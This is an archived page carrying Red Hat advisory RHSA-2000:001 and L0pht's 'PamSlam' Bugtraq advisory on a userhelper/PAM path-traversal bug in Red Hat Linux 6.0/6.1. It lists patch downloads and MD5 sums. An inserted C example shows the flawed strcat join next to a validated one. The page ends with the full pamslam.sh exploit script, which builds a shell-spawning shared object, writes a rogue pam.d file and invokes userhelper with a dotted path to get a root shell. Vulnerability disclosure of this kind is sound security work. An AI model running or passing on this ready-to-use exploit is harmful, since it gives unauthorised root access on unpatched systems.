[ http://www.rootshell.com/ ]
Date: Tue, 04 Jan 2000 11:58:23 -0500
From: Michael K. Johnson <johnsonm@redhat.com>
---------------------------------------------------------------------
Red Hat, Inc. Security Advisory
Synopsis: New version of usermode fixes security bug
Advisory ID: RHSA-2000:001-01
Issue date: 2000-01-04
Updated on: 2000-01-04
Keywords: root userhelper pam
Cross references:
---------------------------------------------------------------------
1. Topic:
A security bug has been discovered and fixed in the userhelper program.
2. Relevant releases/architectures:
Red Hat Linux 6.0 and 6.1, all architectures.
3. Problem description:
A security bug was found in userhelper; the bug can be exploited to
provide local users with root access.
The bug has been fixed in userhelper-1.17, and pam-0.68-10 has been
modified to help prevent similar attacks on other software in the future.
4. Solution:
For each RPM for your particular architecture, run:
rpm -Uvh <filename>
where filename is the name of the RPM.
5. Bug IDs fixed (http://bugzilla.redhat.com/bugzilla/ for more info):
6. Obsoleted by:
7. Conflicts with:
8. RPMs required:
Intel:
ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm
ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm
Alpha:
ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm
ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm
Sparc:
ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm
ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm
Source packages:
ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm
ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm
9. Verification:
MD5 sum Package Name
--------------------------------------------------------------------------
bffd4388103fa99265e267eab7ae18c8 i386/pam-0.68-10.i386.rpm
2d69859d2b1d2180d254fc263bdccf94 i386/usermode-1.17-1.i386.rpm
fed2c2ad4f95829e14727a9dfceaca07 alpha/pam-0.68-10.alpha.rpm
83c69cb92b16bb0eef295acb4c857657 alpha/usermode-1.17-1.alpha.rpm
350662253d09b17d0aca4e9c7a511675 sparc/pam-0.68-10.sparc.rpm
d89495957c9a438fda657b8a4a5f5578 sparc/usermode-1.17-1.sparc.rpm
f9ad800f56b7bb05ce595bad824a990d SRPMS/pam-0.68-10.src.rpm
1d3b367d257a57de7d834043a4fcd87a SRPMS/usermode-1.17-1.src.rpm
These packages are GPG signed by Red Hat, Inc. for security. Our key
is available at:
http://www.redhat.com/corp/contact.html
You can verify each package with the following command:
rpm --checksig <filename>
If you only wish to verify that each package has not been corrupted or
tampered with, examine only the md5sum with the following command:
rpm --checksig --nogpg <filename>
10. References:
Thanks to dildog@l0pht.com for finding this bug.
--------------------------------------------------------------------------
From dildog@L0PHT.COM Tue Jan 4 21:25:18 2000
Date: Tue, 4 Jan 2000 20:09:05 -0500
From: Dildog <dildog@L0PHT.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: L0pht Advisory: RH Linux 6.0/6.1, PAM and userhelper
L0pht Security Advisory
Advisory Name: PamSlam
Advisory Released: [01/04/00]
Application: userhelper and PAM on Redhat Linux 6.0/6.1
Severity: A local user can gain root access.
Status: Vendor contacted. Fix provided by vendor.
Advisory released.
Author: dildog@l0pht.com
WWW: http://www.l0pht.com/advisories.html
Overview:
Both 'pam' and 'userhelper' (a setuid binary that comes with the
'usermode-1.15' rpm) follow .. paths. Since pam_start calls down to
_pam_add_handler(), we can get it to dlopen any file on disk. 'userhelper'
being setuid means we can get root.
Description:
Because both userhelper and PAM follow .. paths, we can craft a file that
causes userhelper (by way of PAM) to dlopen any shared object we want, as root.
The exploit is simple, and uses the '-w' option of userhelper, which lets us
specify a program to run with the privileges designated by PAM. userhelper tries
to execute only programs that have entries in /etc/security/console.apps, but
since we get to specify the name, something like ../../../tmp/myprog gets us a
file open path that looks like /etc/security/console.apps/../../../tmp/myprog.
"strcat" is not a good way to keep a filename below a directory!
After this hurdle, PAM is called to start up the binary, and it does
the same thing, looking for the service's configuration file in /etc/pam.d. If
we've placed a rogue pam.d configuration file in /tmp/myprog, then PAM can be
pointed at /etc/pam.d/../../../tmp/myprog. In the pam.d configuration file, we
get to pick a few shared libraries to dlopen, so at this point, we get root.
The following exploit demonstrates this vulnerability by creating a
'rootshell library' that creates a shell when dlopened, creating a pam.d-style
configuration file, and then running userhelper with the appropriately dotted
path.
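The strcat problem described above, beside the check that prevents it, as an added example in C. This is not code from the advisory, from userhelper, from PAM or from Red Hat's fix (the page does not reproduce the vendor's patch); the directory names are the two the advisory mentions, the allow-list policy in valid_service_name is an assumption made for this example, and the paths are only built in a buffer, never opened.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Directories named in the advisory; the service name is the only
   attacker-controlled input in both lookups. */
#define CONSOLE_APPS_DIR "/etc/security/console.apps/"
#define PAM_D_DIR        "/etc/pam.d/"

/* Vulnerable pattern the advisory describes: directory and untrusted name
   glued together with strcat(). Nothing stops ".." components, so
   "../../../tmp/myprog" yields a path that leaves the directory. */
int build_path_unsafe(char *out, size_t outsz, const char *dir, const char *name)
{
    if (strlen(dir) + strlen(name) + 1 > outsz)
        return -1;
    strcpy(out, dir);
    strcat(out, name);
    return 0;
}

/* True if any '/'-separated component of PATH is exactly "..". */
bool has_dotdot_component(const char *path)
{
    const char *p = path;
    while (*p) {
        const char *end = strchr(p, '/');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        if (len == 2 && p[0] == '.' && p[1] == '.')
            return true;
        if (!end)
            break;
        p = end + 1;
    }
    return false;
}

/* Hardened check: a service name must be a single path component drawn from a
   conservative allow-list. Rejecting '/' alone already defeats "..", since a
   name without slashes can never leave its directory; rejecting a leading '.'
   also covers ".", ".." and dotfiles. (Assumed policy for this example, not
   the vendor's patch.) */
bool valid_service_name(const char *name)
{
    if (name == NULL || *name == '\0' || *name == '.')
        return false;
    if (strlen(name) > 64)
        return false;
    for (const char *p = name; *p; p++) {
        unsigned char c = (unsigned char)*p;
        if (!(isalnum(c) || c == '_' || c == '-' || c == '.'))
            return false;   /* rejects '/', whitespace and control bytes */
    }
    return true;
}

/* Safe join: validate first, then build with a bounded snprintf(). */
int build_path_safe(char *out, size_t outsz, const char *dir, const char *name)
{
    if (!valid_service_name(name))
        return -1;
    int n = snprintf(out, outsz, "%s%s", dir, name);
    if (n < 0 || (size_t)n >= outsz)
        return -1;
    return 0;
}

/* Does the vulnerable join of NAME under DIR produce a path with a ".."
   component, i.e. one that may escape DIR? */
bool unsafe_path_escapes(const char *dir, const char *name)
{
    char buf[1024];
    if (build_path_unsafe(buf, sizeof buf, dir, name) != 0)
        return false;
    return has_dotdot_component(buf);
}

int main(void)
{
    /* Constructed sample names: one legitimate, three hostile. */
    const char *names[] = { "halt", "../../../tmp/myprog", "..", "foo/bar" };
    char buf[1024];
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++) {
        const char *n = names[i];
        build_path_unsafe(buf, sizeof buf, CONSOLE_APPS_DIR, n);
        printf("strcat:  %-22s -> %s%s\n", n, buf,
               has_dotdot_component(buf) ? "   (escapes!)" : "");
        if (build_path_safe(buf, sizeof buf, PAM_D_DIR, n) == 0)
            printf("checked: %-22s -> %s\n", n, buf);
        else
            printf("checked: %-22s -> rejected\n", n);
    }
    return 0;
}
```

The point of validating the name rather than the joined path is that the name is the attacker's input: once it is confined to one component there is nothing left for a later consumer (here PAM, which performs its own lookup under /etc/pam.d) to be tricked by. Canonicalising the final path with realpath() and checking its prefix would also work, but only for files that already exist, which is exactly the situation here.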
Quick solution:
Download the fix from RedHat at:
Red Hat Linux 6.1:
Intel:
ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm
ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm
Alpha:
ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm
ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm
Sparc:
ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm
ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm
Source packages:
ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm
ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm
Red Hat Linux 6.0:
Intel:
ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm
ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm
ftp://updates.redhat.com/6.0/i386/SysVinit-2.77-2.i386.rpm
Alpha:
ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm
ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm
ftp://updates.redhat.com/6.0/alpha/SysVinit-2.77-2.alpha.rpm
Sparc:
ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm
ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm
ftp://updates.redhat.com/6.0/sparc/SysVinit-2.77-2.sparc.rpm
Source packages:
ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm
ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm
ftp://updates.redhat.com/6.0/SRPMS/SysVinit-2.77-2.src.rpm
Exploit:
The exploit was posted as a uuencoded shell script, pamslam.sh; the decoded
script is reproduced in full below.
Boing.
dildog@l0pht.com
[ For more advisories check out http://www.l0pht.com/advisories.html ]
--------------------------------------------------------------------------
#!/bin/sh
#
# pamslam - vulnerability in Redhat Linux 6.1 and PAM pam_start
# found by dildog@l0pht.com
#
# synopsis:
# both 'pam' and 'userhelper' (a setuid binary that comes with the
# 'usermode-1.15' rpm) follow .. paths. Since pam_start calls down to
# _pam_add_handler(), we can get it to dlopen any file on disk. 'userhelper'
# being setuid means we can get root.
#
# fix:
# No fuckin idea for a good fix. Get rid of the .. paths in userhelper
# for a quick fix. Remember 'strcat' isn't a very good way of confining
# a path to a particular subdirectory.
#
# props to my mommy and daddy, cuz they made me drink my milk.
# Build a shared object whose _init() runs the moment it is dlopen()ed.
# userhelper is setuid root, so setuid(geteuid()) makes the real uid 0 too.
cat > _pamslam.c << EOF
#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>
void _init(void)
{
    setuid(geteuid());
    system("/bin/sh");
}
EOF
echo -n .
# Rogue pam.d-style configuration: one "auth required" line naming our shared
# object by absolute path, so PAM loads it as the authentication module.
echo -e auth\\trequired\\t$PWD/_pamslam.so > _pamslam.conf
chmod 755 _pamslam.conf
echo -n .
gcc -fPIC -o _pamslam.o -c _pamslam.c
echo -n o
ld -shared -o _pamslam.so _pamslam.o
echo -n o
chmod 755 _pamslam.so
echo -n O
rm _pamslam.c
rm _pamslam.o
echo O
# The dotted service name walks out of /etc/security/console.apps (and then
# out of /etc/pam.d) to $PWD/_pamslam.conf, which PAM reads as the service's
# configuration and dlopen()s _pamslam.so from.
/usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf
sleep 1s
rm _pamslam.so
rm _pamslam.conf